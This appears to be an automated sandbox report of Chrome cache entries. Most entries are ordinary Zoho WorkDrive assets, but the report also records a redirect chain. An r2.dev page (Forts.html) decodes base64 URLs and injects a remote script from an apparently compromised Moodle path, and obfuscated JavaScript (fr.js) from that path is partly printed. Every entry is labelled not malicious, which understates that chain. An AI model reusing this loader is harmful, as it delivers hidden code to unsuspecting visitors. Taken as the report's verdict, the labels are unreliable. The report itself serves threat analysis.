Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 160

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	96
Entropy (8bit):	4.413684083937659
Encrypted:	false
SSDEEP:
MD5:	3F96EEB90F101DF43FB444B8547B9FAB
SHA1:	92A2BC2E422EC28050253ADD8D5E2795FFD50566
SHA-256:	8147B9BA7D829974514A9C2626759459ECD85916EEF9C32412E161576E853DB7
SHA-512:	121D8B4EA98422390E01B15E08927E2EC9C07A6FEE3FAEB0E6593F7037C2B2F8A587D7B6FEE0F9028787DBB7D0C4737CA8C3CD6EB180C34BA562951A7BB88EC3
Malicious:	false
Reputation:	low
URL:	https://filedn.com/favicon.ico
Preview:	<html><head><title>404 Not Found</title></head><body>404 Not Found<br>/favicon.ico</body></html>

Chrome Cache Entry: 161

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	737
Entropy (8bit):	5.128983432090687
Encrypted:	false
SSDEEP:
MD5:	B85D6A0786C55DC461D4661372B94F8A
SHA1:	4CB6474FC288AA2AC05413DFEB8C1AA77994EE72
SHA-256:	1B26B3223A95EC329290369EECB503F52321D1A7EFD711D8B9A8D910FEFA796C
SHA-512:	2B949A7C8F149F3122A9C5AC22E55AC41F2596555D6B64EE58622044DB9E1F46B2C782CA43235150F3C8537AE7919CBDD6357CFD251045AF676462C294596258
Malicious:	false
Reputation:	low
URL:	https://workdrive.zohoexternal.com/public/api/v1/files/s8yrwa67a53974b474ef79eb70d1033b872c5/previewinfo
Preview:	{"data":{"id":"s8yrwa67a53974b474ef79eb70d1033b872c5","type":"previewinfo","attributes":{"is_download_server_file":false,"isdeveloper_file":false,"preview_status":1,"print_url":"https://workdrive.zohoexternal.com/print/s8yrwa67a53974b474ef79eb70d1033b872c5","size":"104.9 KB","preview_data_url":"https://previewengine-accl.zohoexternal.com/pdf/WD/s8yrwa67a53974b474ef79eb70d1033b872c5","preview_url":"https://workdrive.zohoexternal.com/preview/s8yrwa67a53974b474ef79eb70d1033b872c5","size_in_bytes":"107462","resource_type_modified":false,"conversion_size_limit_in_bytes":"262144000","conversion_size_limit":"250 MB"},"links":{"self":"https://workdrive.zohoexternal.com/public/api/v1/previewinfo/s8yrwa67a53974b474ef79eb70d1033b872c5"}}}

Chrome Cache Entry: 162

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (9635)
Category:	downloaded
Size (bytes):	50042
Entropy (8bit):	5.524337889122863
Encrypted:	false
SSDEEP:
MD5:	2058C210224146BEE0CEC6DC89ADC256
SHA1:	47305CB9F1F6BE0F94A179EA7F9D35BD6F914AD8
SHA-256:	A0E362018FB2C1F560B72A353B709B752DAB8BA5B20DD4AE6DC7F60A6EA38896
SHA-512:	E91692E0F7F57BB3B620A62637566F453BEB19F063D95CCB3B366014448052A31D7E00B74D700BF2C5418BB6B7D9FFF38D6CBC09E64E99B3C81DADAD4AC2E62A
Malicious:	false
Reputation:	low
URL:	https://workdrive.zohoexternal.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5
Preview:	.<!DOCTYPE html> <html><head><style>..wdInitLoader{position: absolute;width: 2.69230769em;height: 2.69230769em;font-size: 1em;top: 45%;left: 48%;margin: 0;text-align: center;z-index: 1000;transform: translateX(-50%) translateY(-50%);}.wdInitLoader:before {position: absolute;content: '';top: 0;left: 50%;width: 100%;height: 100%;border-radius: 500rem;}.wdInitLoader:after, .wdInitLoader:before {width: 2.69230769em;height: 2.69230769em;margin: 0 0 0 -1.14285714rem;border:.2em solid rgba(0,0,0,.1)}.wdInitLoader:after {position: absolute;content: '';top: 0;left: 50%;width: 100%;height: 100%;-webkit-animation: .6s linear;animation: wdSpinLoader .6s linear;-webkit-animation-iteration-count: infinite;animation-iteration-count: infinite;border-radius: 500rem;border-color: #1095A6 transparent transparent;border-style: solid;border-width: 0.2em;box-shadow: 0 0 0 1px transparent;}@-webkit-keyframes wdSpinLoader{from {transform: rotate(0)}to {transform: rotate(360deg)}}@keyframes wdSpinLoader {from

Chrome Cache Entry: 164

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 68152, version 2.8978
Category:	downloaded
Size (bytes):	68152
Entropy (8bit):	7.996978341917858
Encrypted:	true
SSDEEP:
MD5:	0D8BBCA1E66BA27F16A02C686511EB4C
SHA1:	6434AAD3EA1374E3E3B3563BA841185BCF343C33
SHA-256:	052880FDA6FF58C9649FBC2D075C180AED3A5A617EE6A5DFC1A2D40BF3871245
SHA-512:	B952793E50B40A02FD2CAE2EF962DF9777349280329655529B52EF5C35CDE28463F63328B787836D2C2F707E536A028791194D5E861A1DF639B9AD616A7332D4
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/webfonts/robotomedium/font.woff2
Preview:	wOF2.......8..............#.....................?FFTM..~...$..L.`....\..<.....p..@.6.$..8..... ..r..f..S[X......~.....nRU<.......q.;".....CIq... .>J.Z'.~.!..........,...m.mU......$..1h.i2....YFT..P.....j)..`....@.....2T.Q.c.LR..)..h:."..y..U.>&"..k.zP..&"...s..F...&."@}A....h.F6..;e...I..~.i\.%A.....4....i$Y..2..q.v...U......V....K.t..i.km.\|..^(...A;....R.%vs...7.7...m./'...<.r.....r.......f.f.a.....j.J&M...1m.'.-Gd..6...zk...=Wy8g..5.....e.#f...e..%.......!...S... .T....=.&...`.....N.J}....2\|...#...7p..XI....~.8n].E2$m6..}.0.M.\|Z..g.t.....>.......$.I.)...<.8vG.......kp..!R.RF..E..%...t....H.A8........_....?.b$.\|F...,I.k........@......c.....s..}.W.S.W1...uQ..p~w...\|..L.......D.[..../..Zt..-......w..fW..V...h?.J&.7.L..:;..]h..U...........^."...t.Ex.0.Y....6.u......*.D.$...,@D.Y.....N....5......?D..=w{..u.QJ......fY.eI...n...c".._e<.. ......,9.;n..e..3+...L\...<...X.y\|..L....Ln.........^W..H,.3.h@j.n....E/j..A.`..VP.......t..dZ.&.(=..Etpm

Chrome Cache Entry: 165

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	7492
Entropy (8bit):	4.855572162297628
Encrypted:	false
SSDEEP:
MD5:	286047760A1D77CE18CD030B232FB3AD
SHA1:	59F075C0E9538088BEAF802CD0C0AAD6BB4D6408
SHA-256:	CBDFAD6C697ED7A959A54C6A3C1B2BF82D2929A57A6AA5C557A54DE0A23E75D7
SHA-512:	60E64423F816D7BD185E44BF1AE0745571A2C37ADF521F8278AF03757AC675D4DD3D8AA1E0AD06984484A2CC687F915901E98465CD5E65A63AF195E04C29196A
Malicious:	false
Reputation:	low
URL:	https://workdrive.zohoexternal.com/zwd_sw.js
Preview:	// WorkDrive offline cache format - zwd_offline_date.let zwd_current_cache_name = 'zwd_offline_06_01_2023'; // No I18N..// If response available in cache - Returns the response..// If response not available in cache - Deletes the old finger print cache and return response from web..let cache_first_url_array = [. // App assets../jsapps\/(enterprise\|folders\|files)\/dist\/assets\//,. // Engines assets. /(enterprise\|folders)\/dist\/engines-dist\//,. // theme file. /jsapps\/ui-lab\/dist\/assets\/dev\/default_theme/,. // intl file. /jsapps\/ui-lab\/dist\/assets\/dev\/intl\/js\/team\/team/,. // jquery . /jsapps\/ui-lab\/dist\/assets\/dev\/jquery\/jquery.min/,. // svg icons. /jsapps\/ui-lab\/dist\/assets\/dev\/svg-icons/,. // Zoho WorkDrive logo. /jsapps\/ui-lab\/dist\/assets\/dev\/wd_images\/logowithtext\/zoho-workdrive/,. // xhr worker. /jsapps\/ui-lab\/dist\/assets\/dev\/worker\/xhr_worker.min.js/,. // font files. /\/webfonts\//,. /\/zohofo

Chrome Cache Entry: 166

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	107
Entropy (8bit):	5.309929342222872
Encrypted:	false
SSDEEP:
MD5:	B612E524264ED286C7A3B51EA90B7E27
SHA1:	C293D2664F52115FDD2605A29A3A65D5D9FC929F
SHA-256:	E00E107FF9DEAB8898FB3063B92F1BBDBC095D7B996E983A02F13AFE4563546E
SHA-512:	4BA37A43BC2F719639DB5113E2F045079FA0408B4D11FEB3E5E5564EB6DE3E04EB7328EA33F08C5450C18FD3DE120EDDEF93A0AD961A2BC2FE4E5608AF423EEF
Malicious:	false
Reputation:	low
URL:	https://filedn.com/lwbKvvAtfNbuJhdblVrwwip/Spraki.html
Preview:	<meta HTTP-EQUIV="REFRESH" content="0; url=https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html">

Chrome Cache Entry: 167

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64730)
Category:	downloaded
Size (bytes):	1112459
Entropy (8bit):	5.615586265056021
Encrypted:	false
SSDEEP:
MD5:	86BDE0920C5904AE86590E7010BF898A
SHA1:	CBE3F8DE997219E0514EBB2890C9871A69147D7C
SHA-256:	7BB81AB48644139AB594CA9E78B8CAD021322AB05C5387B2EC2FE2CB2B4C5D58
SHA-512:	DAAD4826A0D075CAE3D067131C9BB4F16A4EE7DF2E58C0151A3A6187C7DF8AE78E9F428F09F347567FF5074E5402006D0D2462606B413827C9C72E6312244F86
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/pdfjs_legacy/legacy/build/pdf.worker.min-86bde0920c5904ae86590e7010bf898a.js
Preview:	/*. @licstart The following is the entire license notice for the. * JavaScript code in this page. . Copyright 2022 Mozilla Foundation. . Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. . http://www.apache.org/licenses/LICENSE-2.0. . Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. . @licend The above is the entire license notice for the. * JavaScript code in this page. */.!function webpackUniversalModuleDefinition(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("pdfjs-dist/build/pdf.worker",[],t):"object

Chrome Cache Entry: 168

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), CFF, length 54808, version 4.0
Category:	downloaded
Size (bytes):	54808
Entropy (8bit):	7.996252347170685
Encrypted:	true
SSDEEP:
MD5:	157A357B6F47D13A8049CFCDE2663433
SHA1:	191FD8EF96021BAF07BAD93C83B2CDA15DB1FA43
SHA-256:	F01F22BE37D334C729AE73555CA608F672BBB9F3014D034459A6B31C4E0F7BC5
SHA-512:	C2E9BC6362C0CC7CF3EB9DF8B1260A99B93A302C27F4C50DDBCD62408358457D144A356529879CA3CCAB5BD37953FE844F7705F716EFE813190735558C1C0CF4
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Bold.woff2
Preview:	wOF2OTTO..........ld..................................h..&...`..X.6.$..8....d. [.kq&.1.C.n`.......j......5.m.7N.....(.=.w.L...N.....'...m.....P.j........r.m&.T.......j..k..Z..l..."v.#....j.L..ffN.v..mC....w<...W.4.Y..B.......I.XM......j...L.K..K....S.......u...5F..>...q.A....0..D\|8.n...........<..p.&.EC(.DHV..%......p.?.\|nu..1..sZ.)..y9.?.]...d...N..D .@.n...[x.m..bN'...r.?a....R2.v..z....4....-..mM..D......0".N.#..0.x....so...y..iD...Ps.(...f...:.h...g...ff..fff...yff...\|..1.Z.$...IB..J.....J../..sr]S...m..}.5.B....."C.ET..A0........)Fc6s...h..x....$'....3 ...p...U.....J...J......~.....Cv..........eZ..).M..@$$..............y...b&G.x.../.......................1D..3.!.!%L....a.o...HH....i.u....0......Y...,IV.(s@......9X..<....n....^U..w.h..5@.....ze.ns./.. lr.K.....}UU.U. ..u...............xe..O...-....... .L..j....khQ.^.@...+. ..!......SQ..._..L...2.).L,..@.x,.K..k.f...a..............o1..I..4.....K..(..n...:.$..R.G.....W.....5.r}......#...

Chrome Cache Entry: 169

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (9784)
Category:	downloaded
Size (bytes):	9785
Entropy (8bit):	5.279450161748166
Encrypted:	false
SSDEEP:
MD5:	9692771AA1230EFFD8F436AB3FB3BD95
SHA1:	C279DCF94C67F4587A48678E8EA17F0AFE402AE2
SHA-256:	07EFE62C3EE8AE1C942BCC0F2EA2F1B5BE9D2F59F6832B83FCEA3988082C5DFB
SHA-512:	60A3C5FB33780034DA7E67C8F750E7F2B648C22CB6DBB048EF8436E9064AA67CEA87329A694A7069658A10242CFCF468DABD04640C42DB5EE35C7DFA0784D1EB
Malicious:	false
Reputation:	low
URL:	https://js.zohostatic.com/murphysdk/v1/murphy.min.js?_=1685544638387
Preview:	!function(){var t,n,o,a,u,r,s,A=window,T=A.location,N=document,O={},c={development:"dev",test:"testing",production:"production"},f={error:"Window Error",exception:"Handled Exception",info:"Custom Info"},p=!1,l=[],h=[],v=[],d=[],k=void 0,m=void 0;function x(e){if("string"!=typeof e)return{};var t=e.match(/^(([^:\/?#]+):)?(\/\/([^\/?#]))?([^?#])(\?([^#]))?(#(.))?$/),r=t[6]\|\|"",n=t[8]\|\|"";return{protocol:t[2],host:t[4],path:t[5],query:r,relative:t[5]+r+n}}function C(e){return"[object String]"===Object.prototype.toString.call(e)}function j(e){return"[object Array]"===Object.prototype.toString.call(e)}function w(e){return"object"==typeof e&&null!==e}function S(e){return"function"==typeof e}function y(){return t==c.development}function B(){return(new Date).getTime()}O.headers={"content-type":"application/json"};function g(e){var i=T.href,r=[],n=[],o={},a=void 0,u=e,s=["click","focus","change","keypress"],f=["type","name","title","alt","lt-prop-dp","data-zcqa","lt-prop-route"];function c(

Chrome Cache Entry: 172

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (329), with no line terminators
Category:	downloaded
Size (bytes):	329
Entropy (8bit):	5.4519113518277305
Encrypted:	false
SSDEEP:
MD5:	E90640D27F3B5EB05EDFE252B48626AA
SHA1:	3E0EC17CA91B39DED14A21AA5393D62DCDCB308E
SHA-256:	3D8499A9360F6B968887FDEA537E1306DBD09FA0862CEF535682B4A32976BC76
SHA-512:	D9D8F7B6FC03070AF36AD217C685A37F1996107BA944648CF44F5B8086C1EA22EC4F287DEE8AB641F3FD304E300E8F4BAADE0CE36CEC84C340A0360FD6835868
Malicious:	false
Reputation:	low
URL:	https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html
Preview:	<html><head></head><body><input type="hidden" id="b64u" value="aHR0cHM6Ly9hdWMuZWR1LnBzL21vb2RsZS9zZW5zZS9ob3N0L2MyMDFiMTAucGhw"></input><script>const per = document.createElement("script");per.src=atob("aHR0cHM6Ly9hdWMuZWR1LnBzL21vb2RsZS9zZW5zZS9ob3N0L2FkbWluL2pzL2ZyLmpz");document.head.appendChild(per);</script></body></html>

Chrome Cache Entry: 173

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (349), with CRLF line terminators
Category:	downloaded
Size (bytes):	2251
Entropy (8bit):	5.061954103286506
Encrypted:	false
SSDEEP:
MD5:	666AC3CDDF802EAEBBD2F999705D5A4A
SHA1:	80449B67A55587B48C7ED79055773BBCAC59AE94
SHA-256:	FA5DA347120C4F9A8AAAA7444340ECB4665B13ED6597BCA2785904D09EF543C3
SHA-512:	C6BB2E8CEBCBA02C829779F6B0E3DB7E20BE99B6677149590AB5DC15EEBF7E3834B5753194E6FAAF19BFC2C803DC62934D485C1A92B1734F9040FBA804350D35
Malicious:	false
Reputation:	low
URL:	https://auc.edu.ps/moodle/sense/host/admin/js/fr.js
Preview:	var _0x1ff763 = _0x5e24;..(function (_0x492252, _0x2872cb) {.. var _0x2b299c = _0x5e24, _0x2a74d5 = _0x492252();.. while (!![]) {.. try {.. var _0x275d4d = parseInt(_0x2b299c(0x17b)) / 0x1 * (-parseInt(_0x2b299c(0x16e)) / 0x2) + parseInt(_0x2b299c(0x179)) / 0x3 + -parseInt(_0x2b299c(0x176)) / 0x4 + parseInt(_0x2b299c(0x17a)) / 0x5 + -parseInt(_0x2b299c(0x175)) / 0x6 + parseInt(_0x2b299c(0x178)) / 0x7 * (-parseInt(_0x2b299c(0x16f)) / 0x8) + parseInt(_0x2b299c(0x16d)) / 0x9;.. if (_0x275d4d === _0x2872cb).. break;.. else.. _0x2a74d5['push'](_0x2a74d5['shift']());.. } catch (_0x166a25) {.. _0x2a74d5['push'](_0x2a74d5['shift']());.. }.. }..}(_0x252e, 0x4a432));..var scr = document[_0x1ff763(0x17c)]('script'), stc = _0x1ff763(0x16c);..function _0x5e24(_0x20abc3, _0x3cca59) {.. var _0x252e1a = _0x252e();.. return _0x5e24 = function (_0x5e243b, _0x3d360a) {.. _0x5e243b = _0x5e2

Chrome Cache Entry: 174

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (41355)
Category:	downloaded
Size (bytes):	86282
Entropy (8bit):	5.05545904176454
Encrypted:	false
SSDEEP:
MD5:	E7D1C71835FC3678FEBA2F2FEFEBA621
SHA1:	1B9AE87172476770954762E20A9EF98A3432C6EE
SHA-256:	0A66F56F8EFA9659064F23A4CBB9E158CE326FD9D5B9EEEDBE6FE67E1A800F23
SHA-512:	690B8DC0FC82C56B753C771FE6D3CFAC6A5BFE1D87667CA4FC5410464AC011683819F98D3E88E8453F09894D9B7E60F50D61000827F934DCDAFE900944416616
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/files/dist/engines-dist/wd-docs-menu/assets/engine-4f3346e246f2c91fb467e1bc5bbe8989.js
Preview:	define("wd-docs-menu/components/docs-menu-item",["exports","zd-cui/utils/wd-jquery","wd-docs-menu/templates/components/docs-menu-item"],(function(e,n,t){"use strict".Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0.var a=Ember.Component.extend({layout:t.default,intl:Ember.inject.service(),docsmenu:Ember.inject.service(),classNames:["item"],classNameBindings:["menu.active:active","show_sub_menu:sub-menu-caller"],attributeBindings:Ember.A(["tabindex"]),debounceObject:Ember.Object.create({currentTimeout:0,maxTimeout:100,isInited:!1}),tabindex:-1,sub_menu_list:Ember.A(),show_sub_menu:!1,handleMouseEnter:Ember._action((function(e){let n=this.Ember.get(n,"debounceObject.currentTimeout")&&clearTimeout(Ember.get(n,"debounceObject.currentTimeout")),Ember.set(n,"debounceObject.currentTimeout",setTimeout((function(){n.isDestroyed&&n.isDestroying\|\|(Ember.set(n,"debounceObject.currentTimeout",0),Ember.set(n,"debounceObject.isInited",!0),n.all_menu.setEach("active",!1),Ember.set(n.m

Chrome Cache Entry: 175

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	low
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 176

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	15086
Entropy (8bit):	4.064303868924217
Encrypted:	false
SSDEEP:
MD5:	3FC468F11B01580D5736D63C7E435717
SHA1:	F2B51CBC3BDCACA4E19E69DF0F912416C96BC658
SHA-256:	812F89CA5A3B848F3107E4FCADEABB34B78A3F49F98D3B42F7C88A029E43BB2B
SHA-512:	104DBE3955E2FDB254149B77B201AD76BF7E73A229F6CF1B04C38412467000F2AA148D93E83D80A11F304EBA70740910104CF11D6CB9FFD9C4415FD6CBB6BD46
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/wd_images/favicons/defaults/favicon.ico
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.....................................................................................................................................................................................................................................................................................................................................................................................................................................................,...-...................&...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...-...,...................................................-...........................................................................................................................................................-...............................l..........................................................................................................................

Chrome Cache Entry: 177

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	323882
Entropy (8bit):	4.278723185856648
Encrypted:	false
SSDEEP:
MD5:	1715D5B062C69C4DA57EAFA6DA7C7569
SHA1:	24F4A14B917D92AA8D1079248544D43CC761B9E6
SHA-256:	981294BDAA1E0D77CD3092296A5F5DE3D380A54C5C7E845BAD795B69CE5DCDC4
SHA-512:	8A6A8396376330C52FFAA9CA9DE86668C46ACA1ED546C60AE9A9C4ED40F612DD4688E48FC99CA9F98871454898AFDD9CDD95D5B490F22D0AE5274A16FB218240
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/svg-icons/icon-list-1715d5b062c69c4da57eafa6da7c7569.js
Preview:	svg_icons={wd_labels:{path:[{d:"M2.94594595,4 C2.40124568,4 2,4.36084247 2,4.75 L2,15.25 C2,15.6391575 2.40124568,16 2.94594595,16 L12.6756757,16 C12.9969347,16 13.2906474,15.8679312 13.4644543,15.659524 L17.8428326,10.409524 C18.0523891,10.1582502 18.0523891,9.84174976 17.8428326,9.59047601 L13.4644543,4.34047601 C13.2906474,4.13206875 12.9969347,4 12.6756757,4 L2.94594595,4 Z M2.94594595,3 L12.6756757,3 C13.2881764,3 13.864932,3.25933978 14.2324324,3.7 L18.6108108,8.95 C19.1297297,9.57222222 19.1297297,10.4277778 18.6108108,11.05 L14.2324324,16.3 C13.864932,16.7406602 13.2881764,17 12.6756757,17 L2.94594595,17 C1.87122968,17 1,16.2164983 1,15.25 L1,4.75 C1,3.78350169 1.87122968,3 2.94594595,3 Z"}]},wd_labels_solid:{path:[{d:"M2.94594595,3 L12.6756757,3 C13.2881764,3 13.864932,3.25933978 14.2324324,3.7 L18.6108108,8.95 C19.1297297,9.57222222 19.1297297,10.4277778 18.6108108,11.05 L14.2324324,16.3 C13.864932,16.7406602 13.2881764,17 12.6756757,17 L2.94594595,17 C1.87122968,17 1,16.2164

Chrome Cache Entry: 179

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	assembler source, ASCII text, with very long lines (17853), with no line terminators
Category:	downloaded
Size (bytes):	17853
Entropy (8bit):	5.013070424401926
Encrypted:	false
SSDEEP:
MD5:	AE21FFF8590FB1AAF1C4C4FE483F549E
SHA1:	A76DA67F9E54D539ECAE8D2ED41AC57F200CA1B5
SHA-256:	E89E2FE8540E55AEBA3057DB8D5F28BB28CFD30CAFF25FE48417D8F4FF1A9201
SHA-512:	F27AA607ABD445A1B53D9537F8ED791E164C806F7AF54ECCDFCC0ABF2DDA96D85E034A22BB6FA9339C38F48F03FB6D770BF8E4407B456EEFD7C32F3CFF1283E6
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/pdfjs/web/pdf_viewer.min-ae21fff8590fb1aaf1c4c4fe483f549e.css
Preview:	.textLayer{position:absolute;text-align:initial;left:0;top:0;right:0;bottom:0;overflow:hidden;opacity:.25;line-height:1;-webkit-text-size-adjust:none;-moz-text-size-adjust:none;text-size-adjust:none;forced-color-adjust:none}.textLayer br,.textLayer span{color:transparent;position:absolute;white-space:pre;cursor:text;transform-origin:0 0}.textLayer span.markedContent{top:0;height:0}.textLayer .highlight{margin:-1px;padding:1px;background-color:rgba(180,0,170,1);border-radius:4px}.textLayer .highlight.appended{position:initial}.textLayer .highlight.begin{border-radius:4px 0 0 4px}.textLayer .highlight.end{border-radius:0 4px 4px 0}.textLayer .highlight.middle{border-radius:0}.textLayer .highlight.selected{background-color:rgba(0,100,0,1)}.textLayer ::-moz-selection{background:AccentColor}.textLayer ::selection{background:AccentColor}.textLayer br::-moz-selection{background:0 0}.textLayer br::selection{background:0 0}.textLayer .endOfContent{display:block;position:absolute;left:0;top:100%

Chrome Cache Entry: 180

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), CFF, length 59724, version 4.0
Category:	downloaded
Size (bytes):	59724
Entropy (8bit):	7.996069634550882
Encrypted:	true
SSDEEP:
MD5:	2442199A236FDE3E5439F4D3D8A58DA6
SHA1:	AEB60E05579AE47D72750E074E9CDCE94CB86018
SHA-256:	4C572C9BC44F0180718999AD4B7B1729ECADEB2272DC10ACC4656A5C970D4023
SHA-512:	580775BC30A17130719C2CAD35B0F5513EFFE6052CAEE997ECB137D680F023B0C3A6897352C6198485ACFC5826E30E199B64DD08288380E1C331BFFBEEABE32F
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Regular.woff2
Preview:	wOF2OTTO...L......................................F.. ...T...`..X.6.$..8...... [..q$..Z...M.Z.0.~.......,.MUU.P...j.m..-..~.......".........P.W......x..41y.ch^jM....v....Q!L..7..].\V....L.Kb.'.r..z[....W..t.{.hf.._.;.0....s..g._..\.v.......].....$..$n4...a3.....Q........{6...e^...W44...4x...}...sz.,....J.. ..".p.DF.bZ."^......d...'.<...z.......!......c...@........g!Uta..C. ..?...C..-p..q.k`...S.....4F..#.2.......Q..{.....I......p..+ODD./"".""...^ji..gZf......c...Y..5..k..6.y..?..L...].Va..].O....bfU...b..%...5.[.>...#..IL.&X..4h!.Y.\|JY.... .........$U...'..K.YQ;."....-.ec....(..DO`...1.B.q.Ed....ry.5...L. ...u.?q...;k.l..3.$..........#G.<I ..'.`.f.........{......$....D%D.t(a3Z.3.$Q.!...^..W._.....y.i...,S...q.5..M....b..V...X:v..RS("M.T{.![..!.-.<..E........x...y.+......7....{.]..'.o.u.E.8!D.M.s....../b....i.. ..A...%...........~.m...UVn...b.4R.X#........r..$.D..$...."...@.....D...!......D......:G..d.U..&D....1.l."W.:..[q....

Chrome Cache Entry: 182

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 374 x 62, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	8636
Entropy (8bit):	7.959782688154348
Encrypted:	false
SSDEEP:
MD5:	8E6E4E4052A63EE1D74E923C5942E763
SHA1:	137987BD48BB30FC79961D312AAA65BC30D27C73
SHA-256:	95448E095F0DA2547F02C5881B1B58908D6CB8661F724F7430001E1D5BBA9E53
SHA-512:	F3BE486567658A1329D76B814E25F6C70E7D42FD9E9299BEF49645B7B3B8FF67571A8D1A0DE41F6B1D6DFFCFF7E60D95E0C778BEBD5771BE959642B30582E6DD
Malicious:	false
Reputation:	low
